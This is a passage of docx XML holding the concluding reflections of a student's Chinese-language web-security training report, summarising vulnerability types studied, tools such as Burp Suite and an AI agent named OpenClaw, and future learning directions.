        <w:t>通过本次实训，我系统性地构建了 Web 安全的知识体系。从最初只知道"SQL 注入"这个名词，到能够独立分析漏洞原理、编写攻击载荷、完成修复方案并编写专业漏洞报告，全过程覆盖了 OWASP Top 10 中的绝大部分核心漏洞类型。更重要的是，学会了从"攻击者视角"和"防御者视角"双向思考问题——在分析每个漏洞时，先理解攻击者如何利用，再设计防御策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 工具使用能力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>熟练掌握了安全从业人员必备的工具链：Kali Linux 作为底层操作系统环境；Burp Suite 进行 HTTP 流量分析、拦截修改和字典攻击；OpenClaw AI Agent 辅助漏洞分析、代码修复和报告自动化生成；Git 进行版本管理和协同开发。这些工具在未来的安全工作中将发挥重要作用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 AI 辅助安全实践</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次实训的一大特色是将 AI Agent（OpenClaw）深度集成到安全工作流中。AI 不仅辅助完成了漏洞分析、修复代码编写和报告文档生成，还能够通过自动化工具有条理地管理项目文件、执行 Git 操作、访问外部资源。这让我深刻感受到 AI 在安全领域的应用前景——AI 不会替代安全工程师，但能大幅提升安全工作的效率和质量，让工程师更专注于高层次的策略设计和分析决策。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 安全思维转变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训最大的收获不是具体的漏洞修复技术，而是安全思维的建立。一个 Web 应用的安全性不是某个"安全功能"决定的，而是由每一个输入点、每一个输出点、每一条数据库查询、每一次系统调用共同决定的。安全不是"加一个防火墙"或"装一个 WAF"就能解决的，它需要渗透到开发的全生命周期——从需求分析、架构设计、编码实现到测试部署的每个环节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>这次实训的九个修复版本（SQL 注入 → 越权 → CSRF → 文件上传 → 文件包含/XSS → SSRF → SSTI → 命令注入）恰好展示了安全是一个持续的、迭代的过程，而不是一劳永逸的任务。这种"持续安全"的理念将贯穿我未来的技术生涯。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 未来方向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次实训覆盖了 Web 应用安全的主要方面，但安全领域的知识边界远不止于此。未来可以继续深入的方向包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>容器与云安全：Docker/K8s 安全配置、镜像漏洞扫描、容器逃逸防护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>移动安全：Android/iOS 应用逆向、应用加固、隐私合规检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>安全开发实践：DevSecOps 流水线集成、SAST/DAST 工具链搭建、安全需求评审</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>红蓝对抗：参与 CTF 比赛、搭建攻防靶场、演练应急响应流程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